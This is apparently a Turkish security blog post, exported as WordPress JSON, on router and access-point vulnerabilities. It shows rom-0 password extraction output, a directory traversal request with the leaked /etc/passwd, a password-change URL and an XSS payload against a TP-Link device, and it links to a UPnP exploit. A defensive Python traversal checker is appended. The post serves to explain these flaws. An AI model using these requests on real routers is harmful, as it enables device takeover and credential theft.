\n\n \npython rom0-decomp.py<\/span><\/p>\n\n[+] ZTE, TP-Link, ZynOS, Huawei rom-0 Configuration Decompressor<\/span><\/p>\n\n[+] Author: Osanda Malith Jayathissa<\/span><\/p>\n\n[+] Special thanks to Nick Knight<\/span><\/p>\n <\/span><\/p>\n\n[*] Opeining rom-0 file<\/span><\/p>\n\n[+] Dump:<\/span><\/p>\n\n\ufffd\ufffd\ufffd\ufffd<\/span> <\/span><\/span>l<\/span> <\/span><\/span>ttnetZTE60publicpublicpublic\ufffdPPP\ufffdP\ufffdP\ufffdP\ufffd5\ufffdP\ufffdP\ufffd<\/span><\/span><\/p>\n\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\ufffd<\/span><\/p>\n\n \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0@<\/span><\/p>\n <\/span><\/p>\n\n[+] Filtered Strings: <\/span> <\/span><\/span>l<\/span> <\/span><\/span>ttnetZTE60publicpublicpublicPPPPPP5PP@<\/span><\/span><\/p>\n <\/span><\/p>\n\n[~] Router Password is: <\/span>ttnet<\/span><\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nAyn\u0131 bir modemde ikinci bir zafiyet kullan\u0131larak WAN parolas\u0131 ele ge\u00e7irilebilmektedir. Bunun i\u00e7in modem aray\u00fcz\u00fcne yukar\u0131da ele ge\u00e7irilen admin parolas\u0131 kullan\u0131larak eri\u015filir. 
Interface setup, \u0130nternet sekmesine sa\u011f t\u0131klan\u0131p \u00e7er\u00e7eve kaynak kodu g\u00f6r\u00fcnt\u00fclendi\u011finde PPPoE\/PPPoA parolas\u0131 elde edilebilmektedir.<\/span><\/p>\n\n <\/span><\/div>\n <\/b> \n<\/span><\/p>\n\n <\/span><\/div>\n <\/span><\/b><\/p>\n\nTP-Link<\/b><\/span> \u0130kinci bir \u00f6rnek olarak TP-Link TL-WA701N \u00a0modeli 3.12.6 Build 110210 Rel.37112n firmware \u00fczerinde Directory Traversal tipi atak tespit edilmi\u015f. Bu atak istismar edilerek \/etc\/passwd dosyas\u0131 okunabilmektedir.<\/span><\/p>\n <\/b> \n<\/span><\/p>\n\n\u0130stek<\/span><\/p>\n\n \n\n<\/colgroup>\n\n\n\n \nGET \/help\/..\/..\/etc\/passwd HTTP\/1.1<\/span><\/p>\n\nHost: 192.168.178.2<\/span><\/p>\n\nUser-Agent: Mozilla\/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko\/20100101 Firefox\/14.0.1<\/span><\/p>\n\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8<\/span><\/p>\n\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3<\/span><\/p>\n\nAccept-Encoding: gzip, deflate<\/span><\/p>\n\nProxy-Connection: keep-alive<\/span><\/p>\n\nReferer: http:\/\/192.168.178.2\/help\/<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nCevap<\/span><\/p>\n\n \n\n<\/colgroup>\n\n\n\n \nHTTP\/1.1 200 OK<\/span><\/p>\n\nServer: TP-LINK Router<\/span><\/p>\n\nConnection: close<\/span><\/p>\n\nWWW-Authenticate: Basic realm=”TP-LINK Wireless Lite N Access Point WA701N”<\/span><\/p>\n\nContent-Type: text\/html<\/span><\/p>\n <\/span><\/p>\n\n<META http-equiv=Content-Type content=”text\/html; charset=iso-8859-1″><\/span><\/p>\n\n<HTML><\/span><\/p>\n\n<HEAD><TITLE>TL-WA701N<\/TITLE><\/span><\/p>\n\n<META http-equiv=Pragma content=no-cache><\/span><\/p>\n\n<META http-equiv=Expires content=”wed, 26 Feb 1997 08:21:57 GMT”><\/span><\/p>\n\n<LINK href=”\/dynaform\/css_help.css” rel=stylesheet type=”text\/css”><\/span><\/p>\n\n<SCRIPT language=”javascript” 
type=”text\/javascript”><!–<\/span><\/p>\n\nif(window.parent == window)window.location.href=”http:\/\/192.168.178.2″;<\/span><\/p>\n\nfunction Click() return false;<\/span><\/p>\n\ndocument.oncontextmenu=Click;<\/span><\/p>\n\nfunction doPrev()history.go(-1);<\/span><\/p>\n\n\/\/–><\/SCRIPT><\/span><\/p>\n\nroot:x:0:0:root:\/root:\/bin\/sh<\/span><\/p>\n\nAdmin:x:0:0:root:\/root:\/bin\/sh<\/span><\/p>\n\nbin:x:1:1:bin:\/bin:\/bin\/sh<\/span><\/p>\n\ndaemon:x:2:2:daemon:\/usr\/sbin:\/bin\/sh<\/span><\/p>\n\nadm:x:3:4:adm:\/adm:\/bin\/sh<\/span><\/p>\n\nlp:x:4:7:lp:\/var\/spool\/lpd:\/bin\/sh<\/span><\/p>\n\nsync:x:5:0:sync:\/bin:\/bin\/sync<\/span><\/p>\n\nshutdown:x:6:11:shutdown:\/sbin:\/sbin\/shutdown<\/span><\/p>\n\nhalt:x:7:0:halt:\/sbin:\/sbin\/halt<\/span><\/p>\n\nuucp:x:10:14:uucp:\/var\/spool\/uucp:\/bin\/sh<\/span><\/p>\n\noperator:x:11:0:Operator:\/var:\/bin\/sh<\/span><\/p>\n\nnobody:x:65534:65534:nobody:\/home:\/bin\/sh<\/span><\/p>\n\nap71:x:500:0:Linux User,,,:\/root:\/bin\/sh<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nZafiyet kullan\u0131c\u0131 ad\u0131, parola de\u011fi\u015ftirme \u015feklinde farkl\u0131 atak vekt\u00f6rleriyle istismar edilebilir.<\/span><\/p>\n <\/b> \n<\/span><\/p>\n\n\u0130stek<\/span><\/p>\n\n \n\n<\/colgroup>\n\n\n\n \nhttp:\/\/192.168.178.2\/userRpm\/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX<\/span><\/p>\n\n&newpassword2=XXXX&Save=Save<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n <\/b> \n<\/span><\/p>\n\nVeya XSS ile MAC filtreleme ayarlar\u0131 de\u011fi\u015ftirilebilir.<\/span><\/p>\n <\/b> \n<\/span><\/p>\n\n\u0130stek<\/span><\/p>\n<\/p>\n <\/p>\n \n \n\n<\/colgroup>\n\n\n\n 
\nhttp:\/\/192.168.178.2\/userRpm\/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%281)>&<\/span><\/p>\n\nType=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n <\/span><\/div>\n\nMisfortune Cookie<\/span><\/b><\/p>\n\n CVE-2014-9222 kodlu misfortune cookie zafiyeti, sald\u0131rganlara AP \u00fczerinde kimlik do\u011frulamas\u0131z Administrator haklar\u0131 vermektedir. RomPager isimli g\u00f6m\u00fcl\u00fc web sunucuda ke\u015ffedilen bu zafiyet 200’den fazla modelde mevcuttur. Sald\u0131rganlar bu zafiyeti istismar ederek t\u00fcm trafi\u011fi izleyebilirler. [<\/span>Link]<\/span><\/div>\n\nUPNP<\/b><\/span><\/span><\/p>\n\n \n \nElektronik cihazlar\u0131n kolayca a\u011fa dahil olmas\u0131 ve birbirleriyle uyumlu \u00e7al\u0131\u015fabilmesi amac\u0131yla kullan\u0131lan bir servis olan UPnP \u00fczerinde de bilinen kritik bir zafiyet vard\u0131r. Bu zafiyet istismar edilerek WAN \u00fczerinden AP’ye uzaktan ba\u011flant\u0131 sa\u011flanabilir, cihazdan yap\u0131land\u0131rma dosyalar\u0131 \u00e7ekilebilir.\u00a0<\/span><\/p>\n\n <\/p>\nBGA\u2019dan Onur ALANBEL<\/span>\u2019in MiniUPnPd \u00fczerindeki bir zafiyet i\u00e7in yazd\u0131\u011f\u0131 istismar kodu, T\u00fcrkiye\u2019de yayg\u0131n olarak kullan\u0131lan modemlere root haklar\u0131yla ba\u011flanarak t\u00fcm trafi\u011fi y\u00f6nlendirme, yap\u0131land\u0131rma dosyalar\u0131na eri\u015fim, vb. ataklar yap\u0131labilece\u011fini g\u00f6stermi\u015ftir. Bulunan y\u0131\u011f\u0131n ta\u015fmas\u0131 zafiyeti istismar edilerek tam yetkili eri\u015fim sa\u011flanan \u00f6rnek \u00e7al\u0131\u015fmaya https:\/\/www.exploit-db.com\/docs\/36806.pdf adresinden eri\u015filebilir. 
\u0130stismar kodlar\u0131na ise https:\/\/www.exploit-db.com\/exploits\/36839\/<\/span> bu ba\u011flant\u0131dan ula\u015f\u0131labilir.<\/span><\/div>\n<\/div>\n<\/div>\n\nFurkan SANDAL<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"AP\/Router \u00dczerinde \u00c7\u0131kan Zafiyetler Access Point arabirimi, yaz\u0131l\u0131m\u0131 (firmware) di\u011fer bir\u00e7ok a\u011f cihaz\u0131 gibi g\u00fcvenlik zafiyetleri bar\u0131nd\u0131rabilirler. Bu zafiyetler ve…<\/p>\n","protected":false},"author":1,"featured_media":494,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","footnotes":""},"categories":[6,1,9,10,7,4],"tags":[78,76,88,89,26,83,81,79,82,77,80,84,85,87,86],"aioseo_notices":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/furkansandal.com\/wp-content\/uploads\/2015\/08\/fiziksel_guvenlik.jpg?fit=227%2C226&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p6BM7I-7X","amp_enabled":true,"_links":{"self":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/493"}],"collection":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/comments?post=493"}],"version-history":[{"count":0,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/posts\/493\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media\/494"}],"wp:attachment":[{"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/media?parent=493"}],"wp:term":[{"taxonomy":"category","embeddable"
:true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/categories?post=493"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/furkansandal.com\/wp-json\/wp\/v2\/tags?post=493"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
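Added example (not part of the original post and not TP-Link code): the TL-WA701N request `GET /help/../../etc/passwd` shown above works when a web server maps the request path to a file without checking that the result stays under its document root. The sketch below implements that check and goes beyond the page's single case by also covering percent-encoded and backslash forms; the document root `/web`, the function names and the sample request lines are assumptions constructed for illustration.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/web"  # assumed document root; not taken from the device firmware


def resolve_request_path(target, doc_root=DOC_ROOT, max_decode=3):
    """Map a request target onto doc_root, or return None if it escapes it."""
    path = target.split("?", 1)[0].split("#", 1)[0]
    for _ in range(max_decode):          # undo nested percent-encoding
        path = unquote(path)
    if unquote(path) != path or "\x00" in path:
        return None                      # still encoded, or NUL byte: reject
    parts = []
    for seg in path.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                return None              # would climb above the document root
            parts.pop()
        else:
            parts.append(seg)
    return posixpath.join(doc_root, *parts)


def flag_traversal(request_lines):
    """Return the targets of request lines that escape the document root."""
    flagged = []
    for line in request_lines:
        fields = line.split()
        if len(fields) == 3 and resolve_request_path(fields[1]) is None:
            flagged.append(fields[1])
    return flagged


# Constructed request lines; only the first traversal form appears on the page.
SAMPLE_REQUESTS = [
    "GET /help/index.htm HTTP/1.1",
    "GET /help/../../etc/passwd HTTP/1.1",
    "GET /help/%2e%2e/%2e%2e/etc/passwd HTTP/1.1",
    "GET /help/%252e%252e/%252e%252e/etc/passwd HTTP/1.1",
    "GET /help/..%5c..%5cetc/passwd HTTP/1.1",
    "GET /help/../userRpm/WlanMacFilterRpm.htm?Page=1 HTTP/1.1",
]

if __name__ == "__main__":
    for target in flag_traversal(SAMPLE_REQUESTS):
        print("escapes document root:", target)
```

The last sample contains `..` but stays inside the document root, so it resolves normally; the check rejects on where the path ends up, not on the mere presence of dot segments.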